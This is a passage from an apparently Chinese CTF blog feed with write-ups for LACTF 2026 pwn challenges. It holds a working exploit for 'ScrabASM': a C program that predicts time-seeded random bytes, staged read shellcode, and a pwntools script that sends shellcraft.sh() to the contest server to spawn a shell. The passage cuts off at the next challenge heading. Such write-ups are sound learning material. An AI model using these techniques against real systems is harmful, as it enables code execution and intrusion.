rdi-&gt;0x2F9FD0-&gt;/bin/sh\x00</span> </span></span><span class="line"><span class="cl"><span class="c1"># rsi-&gt;0</span> </span></span><span class="line"><span class="cl"><span class="c1"># rdx-&gt;0</span> </span></span></code></pre></td></tr></table> </div> </div>LACTF2026-pwn 个人题解https://blog.ratherhard.com/post/ctf-pwn/contest/lactf-2026-pwn-wp/Wed, 11 Feb 2026 02:38:00 +0000https://blog.ratherhard.com/post/ctf-pwn/contest/lactf-2026-pwn-wp/<img src="https://blog.ratherhard.com/" alt="Featured image of post LACTF2026-pwn 个人题解" /><h2 id="tic-tac-no">tic-tac-no </h2><h3 id="ida">IDA </h3><h4 id="main">main </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="198px" data-flex-grow="82" height="784" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tic-tac-no/main.png" width="649"></p> <p>井字棋</p> <h4 id="playermove">playerMove </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="253px" data-flex-grow="105" height="534" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tic-tac-no/playerMove.png" width="564"></p> <p>数组越界写</p> <h4 id="checkwin">checkWin </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="513px" data-flex-grow="213" height="345" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tic-tac-no/checkWin.png" width="738"></p> <p>相同字符就胜利</p> <h4 id="bss">bss </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="195px" data-flex-grow="81" height="977" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tic-tac-no/bss.png" width="795"></p> <p>越界写把电脑的棋子变成自己的就行了,脚本都不用写</p> <h2 id="scrabasm">ScrabASM </h2><h3 id="ida-1">IDA </h3><h4 id="main-1">main </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="191px" data-flex-grow="79" height="998" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/ScrabASM/main.png" width="796"></p> <h4 id="swap_tile">swap_tile </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="247px" data-flex-grow="103" height="558" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/ScrabASM/swap_tile.png" width="576"></p> <h4 id="play">play </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="360px" data-flex-grow="150" height="421" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/ScrabASM/play.png" width="633"></p> <p>其实就是执行随机生成的 shellcode ,但可以更换任意字节为随机字节</p> <h3 id="攻击思路">攻击思路 </h3><p>由于 srand 以时间作种子,可以考虑在同时运行本地随机数生成程序和攻击脚本以预测随机数,进而控制 shellcode</p> <p>且由于只有 15 字节的空间,我们可以先执行 read shellcode 再自行写入提权 shellcode</p> <p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="359px" data-flex-grow="149" height="1313" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/ScrabASM/reg.png" width="1968"></p> <p>(这张图片用了队友 ItsFlicker 的,懒得自己再截了)</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">add al, 0xd </span></span><span class="line"><span class="cl">push rax </span></span><span class="line"><span class="cl">pop rsi </span></span><span class="line"><span class="cl">xor edi, edi </span></span><span class="line"><span class="cl">push rdi </span></span><span class="line"><span class="cl">pop rax </span></span><span class="line"><span class="cl">mov dl, 0xf0 </span></span><span class="line"><span class="cl">syscall </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">{ 0x04, 0x0D, 0x50, 0x5E, 0x31, 0xFF, 0x57, 0x58, 0xB2, 0xF0, 0x0F, 0x05 } </span></span></code></pre></td></tr></table> </div> </div><h3 id="exp">exp </h3><h4 id="c">c </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;time.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">t</span> <span class="o">=</span> <span class="nf">time</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">srand</span><span class="p">(</span><span class="n">t</span> <span class="o">+</span> <span class="mi">2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">FILE</span> <span class="o">*</span><span class="n">fp</span> <span class="o">=</span> <span class="nf">fopen</span><span class="p">(</span><span class="s">&#34;./beyond.txt&#34;</span><span class="p">,</span> <span class="s">&#34;w&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">fp</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">1000</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">fprintf</span><span class="p">(</span><span class="n">fp</span><span class="p">,</span> <span class="s">&#34;%02x &#34;</span><span class="p">,</span> <span class="nf">rand</span><span class="p">()</span> <span class="o">%</span> <span class="mh">0x100</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">srand</span><span class="p">(</span><span class="n">t</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">fp</span> <span class="o">=</span> <span class="nf">fopen</span><span class="p">(</span><span class="s">&#34;./present.txt&#34;</span><span class="p">,</span> <span class="s">&#34;w&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">fp</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">1000</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">fprintf</span><span class="p">(</span><span class="n">fp</span><span class="p">,</span> <span class="s">&#34;%02x &#34;</span><span class="p">,</span> <span class="nf">rand</span><span class="p">()</span> <span class="o">%</span> <span class="mh">0x100</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">srand</span><span class="p">(</span><span class="n">t</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">fp</span> <span class="o">=</span> <span class="nf">fopen</span><span class="p">(</span><span class="s">&#34;./future.txt&#34;</span><span class="p">,</span> <span class="s">&#34;w&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">fp</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">1000</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">fprintf</span><span class="p">(</span><span class="n">fp</span><span class="p">,</span> <span class="s">&#34;%02x &#34;</span><span class="p">,</span> <span class="nf">rand</span><span class="p">()</span> <span class="o">%</span> <span class="mh">0x100</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="python">python </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">&#39;./chall&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;chall.lac.tf&#39;</span><span class="p">,</span> <span class="mi">31338</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">nowrd</span> <span class="o">=</span> <span class="p">[]</span> </span></span><span class="line"><span class="cl"><span class="n">prsrd</span> <span class="o">=</span> <span class="p">[]</span> </span></span><span class="line"><span class="cl"><span class="n">ftrrd</span> <span class="o">=</span> <span class="p">[]</span> </span></span><span class="line"><span class="cl"><span class="n">bydrd</span> <span class="o">=</span> <span class="p">[]</span> </span></span><span class="line"><span class="cl"><span class="n">tag</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">nowstep</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">*</span> <span class="mi">14</span> </span></span><span class="line"><span class="cl"><span class="n">rout</span> <span class="o">=</span> <span class="p">[]</span> </span></span><span class="line"><span class="cl"><span class="n">fag</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">*</span> <span class="mi">14</span> </span></span><span class="line"><span class="cl"><span class="n">sc</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;04&#39;</span><span class="p">,</span> <span class="s1">&#39;0d&#39;</span><span class="p">,</span> <span class="s1">&#39;50&#39;</span><span class="p">,</span> <span class="s1">&#39;5e&#39;</span><span class="p">,</span> <span class="s1">&#39;48&#39;</span><span class="p">,</span> <span class="s1">&#39;31&#39;</span><span class="p">,</span> <span class="s1">&#39;ff&#39;</span><span class="p">,</span> <span class="s1">&#39;57&#39;</span><span class="p">,</span> <span class="s1">&#39;58&#39;</span><span class="p">,</span> <span class="s1">&#39;b2&#39;</span><span class="p">,</span> <span class="s1">&#39;f0&#39;</span><span class="p">,</span> <span class="s1">&#39;0f&#39;</span><span class="p">,</span> <span class="s1">&#39;05&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">rdbt</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">nowrd</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Your starting tiles:&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">14</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;| &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">nowrd</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">&#39;utf-8&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">prsbt</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">prsrd</span> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;present.txt&#39;</span><span class="p">,</span> <span class="s1">&#39;r&#39;</span><span class="p">,</span> <span class="n">encoding</span> <span class="o">=</span> <span class="s1">&#39;utf-8&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">prsrd</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">split</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">ftrbt</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">ftrrd</span> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;future.txt&#39;</span><span class="p">,</span> <span class="s1">&#39;r&#39;</span><span class="p">,</span> <span class="n">encoding</span> <span class="o">=</span> <span class="s1">&#39;utf-8&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">ftrrd</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">split</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">bydbt</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">bydrd</span> </span></span><span class="line"><span class="cl"> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;beyond.txt&#39;</span><span class="p">,</span> <span class="s1">&#39;r&#39;</span><span class="p">,</span> <span class="n">encoding</span> <span class="o">=</span> <span class="s1">&#39;utf-8&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">bydrd</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">split</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">randswap</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">prepos</span> <span class="o">=</span> <span class="mi">13</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">nowpos</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">14</span><span class="p">,</span> <span class="mi">1000</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">flag</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> <span class="n">op</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">sc</span><span class="p">)):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">sc</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="n">nowrd</span><span class="p">[</span><span class="n">nowpos</span><span class="p">]</span> <span class="ow">and</span> <span class="n">fag</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">flag</span> <span class="o">=</span> <span class="n">i</span> </span></span><span class="line"><span class="cl"> <span class="n">fag</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> <span class="n">op</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">op</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">nowstep</span><span class="p">[</span><span class="n">flag</span><span class="p">]</span> <span class="o">=</span> <span class="n">nowpos</span> <span class="o">-</span> <span class="n">prepos</span> </span></span><span class="line"><span class="cl"> <span class="n">prepos</span> <span class="o">=</span> <span class="n">nowpos</span> </span></span><span class="line"><span class="cl"> <span class="n">rout</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">rout</span><span class="p">)</span> <span class="o">==</span> <span class="mi">14</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">swapidx</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">rout</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">nowstep</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">nowrd</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">tag</span> </span></span><span class="line"><span class="cl"> <span class="n">rdbt</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">prsbt</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">ftrbt</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">bydbt</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">flag</span> <span class="o">=</span> <span class="mi">7</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">nowrd</span><span class="p">)):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">nowrd</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">!=</span> <span class="n">prsrd</span><span class="p">[</span><span class="n">i</span><span class="p">]:</span> </span></span><span class="line"><span class="cl"> <span class="n">flag</span> <span class="o">=</span> <span class="n">flag</span> <span class="o">&amp;</span> <span class="mb">0b110</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">nowrd</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">!=</span> <span class="n">ftrrd</span><span class="p">[</span><span class="n">i</span><span class="p">]:</span> </span></span><span class="line"><span class="cl"> <span class="n">flag</span> <span class="o">=</span> <span class="n">flag</span> <span class="o">&amp;</span> <span class="mb">0b101</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">nowrd</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">!=</span> <span class="n">bydrd</span><span class="p">[</span><span class="n">i</span><span class="p">]:</span> </span></span><span class="line"><span class="cl"> <span class="n">flag</span> <span class="o">=</span> <span class="n">flag</span> <span class="o">&amp;</span> <span class="mb">0b011</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">flag</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">tag</span> <span class="o">=</span> <span class="s1">&#39;prs&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">nowrd</span> <span class="o">=</span> <span class="n">prsrd</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">flag</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">tag</span> <span class="o">=</span> <span class="s1">&#39;prs&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">nowrd</span> <span class="o">=</span> <span class="n">ftrrd</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">flag</span> <span class="o">==</span> <span class="mi">4</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">tag</span> <span class="o">=</span> <span class="s1">&#39;prs&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">nowrd</span> <span class="o">=</span> <span class="n">bydrd</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">tag</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">randswap</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">rout</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">nowstep</span><span class="p">[</span><span class="n">i</span><span class="p">]):</span> </span></span><span class="line"><span class="cl"> <span class="n">swapidx</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">mysc</span> <span class="o">=</span> <span class="n">shellcraft</span><span class="o">.</span><span class="n">sh</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">asm</span><span class="p">(</span><span class="n">mysc</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="tcademy">tcademy </h2><h4 